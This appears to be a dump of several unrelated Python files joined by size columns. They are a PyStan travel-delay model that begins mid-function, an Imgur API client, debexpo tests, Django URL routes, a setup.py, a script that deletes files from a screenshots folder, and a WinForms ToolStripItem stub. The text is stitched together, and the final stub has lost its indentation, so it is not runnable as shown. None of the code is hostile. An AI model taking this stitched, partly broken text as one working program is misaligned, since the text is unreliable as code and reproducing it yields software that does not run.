    travel_time = np.random.normal(2.0, 0.2, size=nb_samples)
    arrival_delay = np.random.exponential(0.1, size=nb_samples)
    arrival_time = np.random.normal(departure_delay +
                                    travel_time +
                                    arrival_delay,
                                    0.5, size=nb_samples)

    # Define the Stan model (mirrors the generative process above;
    # beta_a/beta_b are the exponential rates, mu_t/sigma_t the travel
    # time parameters, sigma_a the arrival-time noise).
    code = """
    data {
        int<lower=0> num;
        vector[num] departure_delay;
        vector[num] travel_time;
        vector[num] arrival_delay;
        vector[num] arrival_time;
    }
    parameters {
        real beta_a;
        real beta_b;
        real mu_t;
        real sigma_t;
        real sigma_a;
    }
    model {
        departure_delay ~ exponential(beta_a);
        travel_time ~ normal(mu_t, sigma_t);
        arrival_delay ~ exponential(beta_b);
        arrival_time ~ normal(departure_delay +
                              travel_time +
                              arrival_delay,
                              sigma_a);
    }
    """

    # Compile the model
    model = pystan.StanModel(model_code=code)

    # Define the observation dataset
    data = {
        "num": nb_samples,
        "departure_delay": departure_delay,
        "arrival_time": arrival_time,
        "travel_time": travel_time,
        "arrival_delay": arrival_delay
    }

    # Fit the model: 2 chains of 10000 iterations, first 1000 discarded
    # as warm-up.
    fit = model.sampling(data=data, iter=10000,
                         refresh=10000, warmup=1000,
                         chains=2, seed=1000)

    # Show a fit summary
    print(fit)

    # Sample some parameters from the posterior distribution
    ext = fit.extract()
    beta_a = ext["beta_a"]
    beta_b = ext["beta_b"]
    mu_t = ext["mu_t"]
    sigma_t = ext["sigma_t"]

    # Show the density estimations of the posterior marginals.
    sns.set()

    fig, ax = plt.subplots(2, 2, figsize=(22, 12))

    sns.distplot(beta_a, kde_kws={"shade": True}, ax=ax[0, 0])
    sns.distplot(beta_b, kde_kws={"shade": True}, ax=ax[0, 1])
    sns.distplot(mu_t, kde_kws={"shade": True}, ax=ax[1, 0])
    sns.distplot(sigma_t, kde_kws={"shade": True}, ax=ax[1, 1])

    ax[0, 0].set_title(r"$\beta_0$", fontsize=22)
    ax[0, 1].set_title(r"$\beta_1$", fontsize=22)
    ax[1, 0].set_title(r"$\mu_t$", fontsize=22)
    ax[1, 1].set_title(r"$\sigma_t$", fontsize=22)

    plt.show()
| 2,702 | 965 |
import json
import logging
from datetime import datetime
import requests
from api.imgur import *
from exceptions.pymage_exceptions import NotAbleToDownloadException, ImgurAPICommunicationException
from utils.utils import extract_imgur_id_from_url
LOGGER = logging.getLogger(__name__)
class ImgurAPI:
    """Static helper for the Imgur REST API.

    Resolves Imgur page URLs (single image, album, gallery) to direct
    image links, while tracking the rate-limit headers kept in the
    module-level IMGUR_PARAMS state (from api.imgur).
    """

    @staticmethod
    def get_image_urls(url: str) -> list:
        """Return the direct image URLs behind an Imgur page URL.

        :param url: An imgur.com URL (gallery, album or single image).
        :raises NotAbleToDownloadException: if the API interaction fails.
        """
        imgur_id = extract_imgur_id_from_url(url)
        try:
            if "/gallery/" in url:
                image_urls = ImgurAPI._get_gallery_urls(imgur_id)
            elif "/a/" in url:
                image_urls = ImgurAPI._get_album_urls(imgur_id)
            else:
                # This is a URL with no gallery, album or extension
                image_urls = ImgurAPI._get_simple_imgur_url(imgur_id)
        except ImgurAPICommunicationException:
            raise NotAbleToDownloadException(f"Couldn't process: {url}")
        return image_urls

    @staticmethod
    def _get_simple_imgur_url(imgur_id: str) -> list:
        """Resolve a plain image ID to a one-element list with its link."""
        imgur_endpoint = ImgurAPI._get_endpoint_url(IMGUR_SIMPLE, imgur_id)
        response = ImgurAPI.get(imgur_endpoint)
        if not response.get("success"):
            raise ImgurAPICommunicationException(f"Unsuccessful query to Imgur API for ID: {imgur_id}")
        link = response.get("data").get("link")
        return [link]

    @staticmethod
    def _get_album_urls(imgur_id: str) -> list:
        """Resolve an album ID to the list of its images' links."""
        imgur_endpoint = ImgurAPI._get_endpoint_url(IMGUR_ALBUM, imgur_id)
        response = ImgurAPI.get(imgur_endpoint)
        if not response.get("success"):
            raise ImgurAPICommunicationException(f"Unsuccessful query to Imgur API for ID: {imgur_id}")
        album_urls = [image_data.get("link") for image_data in response.get("data")]
        return album_urls

    @staticmethod
    def _get_gallery_urls(imgur_id: str) -> list:
        """Resolve a gallery ID to the list of its images' links."""
        imgur_endpoint = ImgurAPI._get_endpoint_url(IMGUR_GALLERY, imgur_id)
        response = ImgurAPI.get(imgur_endpoint)
        if not response.get("success"):
            raise ImgurAPICommunicationException(f"Unsuccessful query to Imgur API for ID: {imgur_id}")
        gallery_urls = [image_data.get("link") for image_data in response.get("data").get("images")]
        return gallery_urls

    @staticmethod
    def _get_endpoint_url(endpoint: str, imgur_id: str) -> str:
        """Build the concrete endpoint URL by substituting the Imgur ID."""
        return IMGUR_ENDPOINTS.get(endpoint).replace(IMGUR_ID_URL_PLACEHOLDER, imgur_id)

    @staticmethod
    def _update_api_limits(response: requests.models.Response):
        """Record *response*'s rate-limit headers into IMGUR_PARAMS."""
        reported_user_limit = int(response.headers[IMGUR_API_RESPONSE_HEADER_USER_LIMIT])
        reported_user_remaining = int(response.headers[IMGUR_API_RESPONSE_HEADER_USER_REMAINING])
        reported_user_reset_ts = int(response.headers[IMGUR_API_RESPONSE_HEADER_USER_RESET])
        LOGGER.debug(f"Imgur API Remaining calls: {reported_user_remaining}")
        LOGGER.debug(f"Imgur API Next Limit Reset Timestamp: {reported_user_reset_ts}")
        IMGUR_PARAMS[IMGUR_PARAMS_API_CALLS_LIMITS][IMGUR_PARAMS_API_CALLS_LIMITS_USER_LIMIT] \
            = reported_user_limit
        IMGUR_PARAMS[IMGUR_PARAMS_API_CALLS_LIMITS][IMGUR_PARAMS_API_CALLS_LIMITS_USER_REMAINING] \
            = reported_user_remaining
        IMGUR_PARAMS[IMGUR_PARAMS_API_CALLS_LIMITS][IMGUR_PARAMS_API_CALLS_LIMITS_USER_RESET_TIMESTAMP] \
            = reported_user_reset_ts

    @staticmethod
    def _check_api_limits():
        """Raise when the Imgur credit budget is exhausted; warn when low.

        Headers tracked per the Imgur API docs https://apidocs.imgur.com/:
        X-RateLimit-UserLimit / -UserRemaining / -UserReset (Client*
        variants exist but are not tracked here).
        """
        remaining_calls = IMGUR_PARAMS[IMGUR_PARAMS_API_CALLS_LIMITS][IMGUR_PARAMS_API_CALLS_LIMITS_USER_REMAINING]
        reset_timestamp = IMGUR_PARAMS[IMGUR_PARAMS_API_CALLS_LIMITS][IMGUR_PARAMS_API_CALLS_LIMITS_USER_RESET_TIMESTAMP]
        # BUG FIX: test exhaustion before the warning threshold. The
        # original tested `<= IMGUR_LIMIT_WARNING_THRESHOLD` first, so
        # (assuming a non-negative threshold) the `elif remaining <= 0`
        # branch was unreachable and requests kept being issued after the
        # budget ran out.
        if remaining_calls <= 0:
            readable_reset_time = datetime.utcfromtimestamp(reset_timestamp).strftime('%Y-%m-%d %H:%M:%S')
            raise ImgurAPICommunicationException(f"The limit of calls to the Imgur API has been reached, "
                                                 f"more call will be available at {readable_reset_time}")
        if remaining_calls <= IMGUR_LIMIT_WARNING_THRESHOLD:
            LOGGER.warning(f"Approaching the limit of calls allowed for the Imgur API, remaining: {remaining_calls}")

    @staticmethod
    def get(endpoint: str, headers: dict = None) -> dict:
        """Issue an authenticated GET against the Imgur API.

        :param endpoint: Full endpoint URL.
        :param headers: Optional extra HTTP headers; the Authorization
            header is injected automatically when missing.
        :return: The decoded JSON response body.
        :raises ImgurAPICommunicationException: on configuration, limit,
            HTTP or connection errors.
        """
        # BUG FIX: the original used a mutable default (`headers={}`)
        # shared between calls, so the injected Authorization header
        # leaked across invocations.
        if headers is None:
            headers = {}
        # The Imgur Client ID must be set before we can do anything else
        if not IMGUR_PARAMS.get(IMGUR_PARAMS_CLIENT_ID):
            raise ImgurAPICommunicationException(f"The Client ID for the Imgur API is not set! Skipping {endpoint}")
        # The following will throw an Exception if the limits have been met and will prevent any further call to be made
        # to the Imgur API
        ImgurAPI._check_api_limits()
        # Add the Imgur API Client ID to the Authorization HTTP Header
        if HTTP_HEADER_AUTHORIZATION not in headers:
            headers[HTTP_HEADER_AUTHORIZATION] = f"Client-ID {IMGUR_PARAMS.get(IMGUR_PARAMS_CLIENT_ID)}"
        try:
            LOGGER.debug(f"Querying API Imgur on {endpoint}...")
            with requests.get(endpoint, headers=headers) as response:
                if response.ok:
                    LOGGER.info('Imgur API query successful!')
                    ImgurAPI._update_api_limits(response)
                    data = json.loads(response.text)
                    return data
                else:
                    raise ImgurAPICommunicationException(
                        f"Failed to download, we got an HTTP {response.status_code} error "
                        f"saying {response.text} for {endpoint}")
        except requests.exceptions.ConnectionError as ex:
            LOGGER.error(ex)
            raise ImgurAPICommunicationException(f"Couldn't connect to {endpoint}, because of {str(ex)}")
# Sample Imgur Response
# {
# "data": {
# "id": "7W1xjas",
# "title": null,
# "description": null,
# "datetime": 1541129695,
# "type": "image/jpeg",
# "animated": false,
# "width": 640,
# "height": 691,
# "size": 123980,
# "views": 29125,
# "bandwidth": 3610917500,
# "vote": null,
# "favorite": false,
# "nsfw": true,
# "section": "hentai",
# "account_url": null,
# "account_id": null,
# "is_ad": false,
# "in_most_viral": false,
# "has_sound": false,
# "tags": [],
# "ad_type": 0,
# "ad_url": "",
# "in_gallery": false,
# "link": "https://i.imgur.com/7W1xjas.jpg"
# },
# "success": true,
# "status": 200
# } | 7,377 | 2,393 |
# -*- coding: utf-8 -*-
#
# test_utils.py — Test cases for debexpo.lib.utils
#
# This file is part of debexpo - https://alioth.debian.org/projects/debexpo/
#
# Copyright © 2008 Jonny Lamb <jonny@debian.org>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
"""
Test cases for debexpo.lib.utils.
"""
__author__ = 'Jonny Lamb'
__copyright__ = 'Copyright © 2008 Jonny Lamb'
__license__ = 'MIT'
from unittest import TestCase
from debexpo.lib.utils import *
from debexpo.lib.changes import Changes
class TestUtilsController(TestCase):
    """Unit tests for the helpers in debexpo.lib.utils."""

    def testParseSection(self):
        """parse_section splits 'component/section', defaulting to main."""
        self.assertEqual(parse_section('section'), ['main', 'section'])
        self.assertEqual(parse_section('component/section'),
                         ['component', 'section'])

    def testGetPackageDir(self):
        """get_package_dir builds the pool subdirectory for a package."""
        self.assertEqual(get_package_dir('foo'), 'f/foo')
        self.assertEqual(get_package_dir('libfoo'), 'libf/libfoo')

    def testMd5sum(self):
        """md5sum returns the expected hex digest for a known file."""
        expected = 'fbb0b9c81f8a4fa9b8e3b789cf3b5220'
        self.assertEqual(
            md5sum('debexpo/tests/changes/synce-hal_0.1-1_source.changes'),
            expected)
| 2,305 | 812 |
from django.conf.urls import url

from . import views

urlpatterns = [
    # BUG FIX: every route was named 'index', which makes reverse() and
    # {% url %} ambiguous (only one registration per name can win). Each
    # route now carries a distinct name matching its view.
    url(r'^$', views.index, name='index'),
    url(r'^page/(\d+)/$', views.page, name='page'),
    url(r'^(\d+)/$', views.detail, name='detail'),
    url(r'^(\d+)/bloods/$', views.blood_detail, name='blood_detail'),
    url(r'^(\d+)/donors/$', views.donor_detail, name='donor_detail'),
]
| 354 | 147 |
from __future__ import print_function
import pyignore

# BUG FIX: prefer setuptools (the maintained packaging library) and fall
# back to the legacy distutils only when setuptools is unavailable. The
# original tried distutils first, which (being always present on older
# Pythons) meant setuptools was effectively never used.
try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup

setup(
    name='pyignore',
    version=pyignore.__version__,
    license="MIT",
    description='parse .gitignore file',
    author='codeskyblue',
    author_email='codeskyblue@gmail.com',
    url='http://github.com/codeskyblue/pyignore',
    py_modules=['pyignore'],
    install_requires=[],
)
| 466 | 138 |
import os


def clear_directory(directory):
    """Delete every regular file directly inside *directory*.

    Subdirectories (and their contents) are left untouched.  The original
    inline loop called os.remove on every directory entry, which raises
    on Windows (PermissionError) or POSIX (IsADirectoryError) as soon as
    the folder contains a subdirectory.
    """
    for name in os.listdir(directory):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            os.remove(path)


if __name__ == "__main__":
    # Hard-coded per-user screenshots folder; adjust for other machines.
    screen_dir = r"C:\Users\collv\Pictures\Screenshots"
    clear_directory(screen_dir)
class ToolStripItem(Component,IComponent,IDisposable,IDropTarget,ISupportOleDropSource,IArrangedElement):
""" Represents the abstract base class that manages events and layout for all the elements that a System.Windows.Forms.ToolStrip or System.Windows.Forms.ToolStripDropDown can contain. """
def CreateAccessibilityInstance(self,*args):
"""
CreateAccessibilityInstance(self: ToolStripItem) -> AccessibleObject
Creates a new accessibility object for the System.Windows.Forms.ToolStripItem.
Returns: A new System.Windows.Forms.AccessibleObject for the System.Windows.Forms.ToolStripItem.
"""
pass
def Dispose(self):
"""
Dispose(self: ToolStripItem,disposing: bool)
Releases the unmanaged resources used by the System.Windows.Forms.ToolStripItem and optionally
releases the managed resources.
disposing: true to release both managed and unmanaged resources; false to release only unmanaged resources.
"""
pass
def DoDragDrop(self,data,allowedEffects):
"""
DoDragDrop(self: ToolStripItem,data: object,allowedEffects: DragDropEffects) -> DragDropEffects
Begins a drag-and-drop operation.
data: The object to be dragged.
allowedEffects: The drag operations that can occur.
Returns: One of the System.Windows.Forms.DragDropEffects values.
"""
pass
def GetCurrentParent(self):
"""
GetCurrentParent(self: ToolStripItem) -> ToolStrip
Retrieves the System.Windows.Forms.ToolStrip that is the container of the current
System.Windows.Forms.ToolStripItem.
Returns: A System.Windows.Forms.ToolStrip that is the container of the current
System.Windows.Forms.ToolStripItem.
"""
pass
def GetPreferredSize(self,constrainingSize):
"""
GetPreferredSize(self: ToolStripItem,constrainingSize: Size) -> Size
Retrieves the size of a rectangular area into which a control can be fit.
constrainingSize: The custom-sized area for a control.
Returns: A System.Drawing.Size ordered pair,representing the width and height of a rectangle.
"""
pass
def GetService(self,*args):
"""
GetService(self: Component,service: Type) -> object
Returns an object that represents a service provided by the System.ComponentModel.Component or
by its System.ComponentModel.Container.
service: A service provided by the System.ComponentModel.Component.
Returns: An System.Object that represents a service provided by the System.ComponentModel.Component,or
null if the System.ComponentModel.Component does not provide the specified service.
"""
pass
def Invalidate(self,r=None):
"""
Invalidate(self: ToolStripItem,r: Rectangle)
Invalidates the specified region of the System.Windows.Forms.ToolStripItem by adding it to the
update region of the System.Windows.Forms.ToolStripItem,which is the area that will be
repainted at the next paint operation,and causes a paint message to be sent to the
System.Windows.Forms.ToolStripItem.
r: A System.Drawing.Rectangle that represents the region to invalidate.
Invalidate(self: ToolStripItem)
Invalidates the entire surface of the System.Windows.Forms.ToolStripItem and causes it to be
redrawn.
"""
pass
def IsInputChar(self,*args):
"""
IsInputChar(self: ToolStripItem,charCode: Char) -> bool
Determines whether a character is an input character that the item recognizes.
charCode: The character to test.
Returns: true if the character should be sent directly to the item and not preprocessed; otherwise,false.
"""
pass
def IsInputKey(self,*args):
"""
IsInputKey(self: ToolStripItem,keyData: Keys) -> bool
Determines whether the specified key is a regular input key or a special key that requires
preprocessing.
keyData: One of the System.Windows.Forms.Keys values.
Returns: true if the specified key is a regular input key; otherwise,false.
"""
pass
def MemberwiseClone(self,*args):
"""
MemberwiseClone(self: MarshalByRefObject,cloneIdentity: bool) -> MarshalByRefObject
Creates a shallow copy of the current System.MarshalByRefObject object.
cloneIdentity: false to delete the current System.MarshalByRefObject object's identity,which will cause the
object to be assigned a new identity when it is marshaled across a remoting boundary. A value of
false is usually appropriate. true to copy the current System.MarshalByRefObject object's
identity to its clone,which will cause remoting client calls to be routed to the remote server
object.
Returns: A shallow copy of the current System.MarshalByRefObject object.
MemberwiseClone(self: object) -> object
Creates a shallow copy of the current System.Object.
Returns: A shallow copy of the current System.Object.
"""
pass
def OnAvailableChanged(self,*args):
"""
OnAvailableChanged(self: ToolStripItem,e: EventArgs)
Raises the AvailableChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnBackColorChanged(self,*args):
"""
OnBackColorChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.BackColorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnBoundsChanged(self,*args):
"""
OnBoundsChanged(self: ToolStripItem)
Occurs when the System.Windows.Forms.ToolStripItem.Bounds property changes.
"""
pass
def OnClick(self,*args):
"""
OnClick(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.Click event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDisplayStyleChanged(self,*args):
"""
OnDisplayStyleChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.DisplayStyleChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDoubleClick(self,*args):
"""
OnDoubleClick(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.DoubleClick event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDragDrop(self,*args):
"""
OnDragDrop(self: ToolStripItem,dragEvent: DragEventArgs)
Raises the System.Windows.Forms.ToolStripItem.DragDrop event.
dragEvent: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def OnDragEnter(self,*args):
"""
OnDragEnter(self: ToolStripItem,dragEvent: DragEventArgs)
Raises the System.Windows.Forms.ToolStripItem.DragEnter event.
dragEvent: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def OnDragLeave(self,*args):
"""
OnDragLeave(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.DragLeave event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnDragOver(self,*args):
"""
OnDragOver(self: ToolStripItem,dragEvent: DragEventArgs)
Raises the System.Windows.Forms.ToolStripItem.DragOver event.
dragEvent: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def OnEnabledChanged(self,*args):
"""
OnEnabledChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.EnabledChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnFontChanged(self,*args):
"""
OnFontChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.Control.FontChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnForeColorChanged(self,*args):
"""
OnForeColorChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.ForeColorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnGiveFeedback(self,*args):
"""
OnGiveFeedback(self: ToolStripItem,giveFeedbackEvent: GiveFeedbackEventArgs)
Raises the System.Windows.Forms.ToolStripItem.GiveFeedback event.
giveFeedbackEvent: A System.Windows.Forms.GiveFeedbackEventArgs that contains the event data.
"""
pass
def OnLayout(self,*args):
"""
OnLayout(self: ToolStripItem,e: LayoutEventArgs)
Raises the System.Windows.Forms.Control.Layout event.
e: A System.Windows.Forms.LayoutEventArgs that contains the event data.
"""
pass
def OnLocationChanged(self,*args):
"""
OnLocationChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.LocationChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseDown(self,*args):
"""
OnMouseDown(self: ToolStripItem,e: MouseEventArgs)
Raises the System.Windows.Forms.ToolStripItem.MouseDown event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseEnter(self,*args):
"""
OnMouseEnter(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.MouseEnter event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseHover(self,*args):
"""
OnMouseHover(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.MouseHover event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseLeave(self,*args):
"""
OnMouseLeave(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.MouseLeave event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnMouseMove(self,*args):
"""
OnMouseMove(self: ToolStripItem,mea: MouseEventArgs)
Raises the System.Windows.Forms.ToolStripItem.MouseMove event.
mea: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseUp(self,*args):
"""
OnMouseUp(self: ToolStripItem,e: MouseEventArgs)
Raises the System.Windows.Forms.ToolStripItem.MouseUp event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnOwnerChanged(self,*args):
"""
OnOwnerChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.OwnerChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnOwnerFontChanged(self,*args):
"""
OnOwnerFontChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.Control.FontChanged event when the
System.Windows.Forms.ToolStripItem.Font property has changed on the parent of the
System.Windows.Forms.ToolStripItem.
e: A System.EventArgs that contains the event data.
"""
pass
def OnPaint(self,*args):
"""
OnPaint(self: ToolStripItem,e: PaintEventArgs)
Raises the System.Windows.Forms.ToolStripItem.Paint event.
e: A System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def OnParentBackColorChanged(self,*args):
"""
OnParentBackColorChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.BackColorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentChanged(self,*args):
"""
OnParentChanged(self: ToolStripItem,oldParent: ToolStrip,newParent: ToolStrip)
Raises the System.Windows.Forms.Control.ParentChanged event.
oldParent: The original parent of the item.
newParent: The new parent of the item.
"""
pass
def OnParentEnabledChanged(self,*args):
"""
OnParentEnabledChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.EnabledChanged event when the
System.Windows.Forms.ToolStripItem.Enabled property value of the item's container changes.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentForeColorChanged(self,*args):
"""
OnParentForeColorChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.ForeColorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnParentRightToLeftChanged(self,*args):
"""
OnParentRightToLeftChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.RightToLeftChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnQueryContinueDrag(self,*args):
"""
OnQueryContinueDrag(self: ToolStripItem,queryContinueDragEvent: QueryContinueDragEventArgs)
Raises the System.Windows.Forms.ToolStripItem.QueryContinueDrag event.
queryContinueDragEvent: A System.Windows.Forms.QueryContinueDragEventArgs that contains the event data.
"""
pass
def OnRightToLeftChanged(self,*args):
"""
OnRightToLeftChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.RightToLeftChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnTextChanged(self,*args):
"""
OnTextChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.TextChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnVisibleChanged(self,*args):
"""
OnVisibleChanged(self: ToolStripItem,e: EventArgs)
Raises the System.Windows.Forms.ToolStripItem.VisibleChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def PerformClick(self):
"""
PerformClick(self: ToolStripItem)
Activates the System.Windows.Forms.ToolStripItem when it is clicked with the mouse.
"""
pass
def ProcessCmdKey(self,*args):
"""
ProcessCmdKey(self: ToolStripItem,m: Message,keyData: Keys) -> (bool,Message)
Processes a command key.
m: A System.Windows.Forms.Message,passed by reference,that represents the window message to
process.
keyData: One of the System.Windows.Forms.Keys values that represents the key to process.
Returns: false in all cases.
"""
pass
def ProcessDialogKey(self,*args):
"""
ProcessDialogKey(self: ToolStripItem,keyData: Keys) -> bool
Processes a dialog key.
keyData: One of the System.Windows.Forms.Keys values that represents the key to process.
Returns: true if the key was processed by the item; otherwise,false.
"""
pass
def ProcessMnemonic(self,*args):
"""
ProcessMnemonic(self: ToolStripItem,charCode: Char) -> bool
Processes a mnemonic character.
charCode: The character to process.
Returns: true in all cases.
"""
pass
def ResetBackColor(self):
"""
ResetBackColor(self: ToolStripItem)
This method is not relevant to this class.
"""
pass
def ResetDisplayStyle(self):
"""
ResetDisplayStyle(self: ToolStripItem)
This method is not relevant to this class.
"""
pass
def ResetFont(self):
"""
ResetFont(self: ToolStripItem)
This method is not relevant to this class.
"""
pass
def ResetForeColor(self):
"""
ResetForeColor(self: ToolStripItem)
This method is not relevant to this class.
"""
pass
def ResetImage(self):
"""
ResetImage(self: ToolStripItem)
This method is not relevant to this class.
"""
pass
def ResetMargin(self):
"""
ResetMargin(self: ToolStripItem)
This method is not relevant to this class.
"""
pass
def ResetPadding(self):
"""
ResetPadding(self: ToolStripItem)
This method is not relevant to this class.
"""
pass
def ResetRightToLeft(self):
"""
ResetRightToLeft(self: ToolStripItem)
This method is not relevant to this class.
"""
pass
def ResetTextDirection(self):
"""
ResetTextDirection(self: ToolStripItem)
This method is not relevant to this class.
"""
pass
def Select(self):
"""
Select(self: ToolStripItem)
Selects the item.
"""
pass
def SetBounds(self,*args):
"""
SetBounds(self: ToolStripItem,bounds: Rectangle)
Sets the size and location of the item.
bounds: A System.Drawing.Rectangle that represents the size and location of the
System.Windows.Forms.ToolStripItem
"""
pass
def SetVisibleCore(self,*args):
"""
SetVisibleCore(self: ToolStripItem,visible: bool)
Sets the System.Windows.Forms.ToolStripItem to the specified visible state.
visible: true to make the System.Windows.Forms.ToolStripItem visible; otherwise,false.
"""
pass
def ToString(self):
"""
ToString(self: ToolStripItem) -> str
Returns: A System.String containing the name of the System.ComponentModel.Component,if any,or null if
the System.ComponentModel.Component is unnamed.
"""
pass
def __enter__(self,*args):
"""
__enter__(self: IDisposable) -> object
Provides the implementation of __enter__ for objects which implement IDisposable.
"""
pass
def __exit__(self,*args):
"""
__exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object)
Provides the implementation of __exit__ for objects which implement IDisposable.
"""
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod
def __new__(self,*args): #cannot find CLR constructor
"""
__new__(cls: type)
__new__(cls: type,text: str,image: Image,onClick: EventHandler)
__new__(cls: type,text: str,image: Image,onClick: EventHandler,name: str)
"""
pass
def __str__(self,*args):
pass
AccessibilityObject=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the System.Windows.Forms.AccessibleObject assigned to the control.
Get: AccessibilityObject(self: ToolStripItem) -> AccessibleObject
"""
AccessibleDefaultActionDescription=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the default action description of the control for use by accessibility client applications.
Get: AccessibleDefaultActionDescription(self: ToolStripItem) -> str
Set: AccessibleDefaultActionDescription(self: ToolStripItem)=value
"""
AccessibleDescription=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the description that will be reported to accessibility client applications.
Get: AccessibleDescription(self: ToolStripItem) -> str
Set: AccessibleDescription(self: ToolStripItem)=value
"""
AccessibleName=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the name of the control for use by accessibility client applications.
Get: AccessibleName(self: ToolStripItem) -> str
Set: AccessibleName(self: ToolStripItem)=value
"""
AccessibleRole=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the accessible role of the control,which specifies the type of user interface element of the control.
Get: AccessibleRole(self: ToolStripItem) -> AccessibleRole
Set: AccessibleRole(self: ToolStripItem)=value
"""
Alignment=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether the item aligns towards the beginning or end of the System.Windows.Forms.ToolStrip.
Get: Alignment(self: ToolStripItem) -> ToolStripItemAlignment
Set: Alignment(self: ToolStripItem)=value
"""
AllowDrop=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether drag-and-drop and item reordering are handled through events that you implement.
Get: AllowDrop(self: ToolStripItem) -> bool
Set: AllowDrop(self: ToolStripItem)=value
"""
Anchor=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets the edges of the container to which a System.Windows.Forms.ToolStripItem is bound and determines how a System.Windows.Forms.ToolStripItem is resized with its parent.
Get: Anchor(self: ToolStripItem) -> AnchorStyles
Set: Anchor(self: ToolStripItem)=value
"""
AutoSize=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether the item is automatically sized.
Get: AutoSize(self: ToolStripItem) -> bool
Set: AutoSize(self: ToolStripItem)=value
"""
AutoToolTip=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a value indicating whether to use the System.Windows.Forms.ToolStripItem.Text property or the System.Windows.Forms.ToolStripItem.ToolTipText property for the System.Windows.Forms.ToolStripItem ToolTip.
Get: AutoToolTip(self: ToolStripItem) -> bool
Set: AutoToolTip(self: ToolStripItem)=value
"""
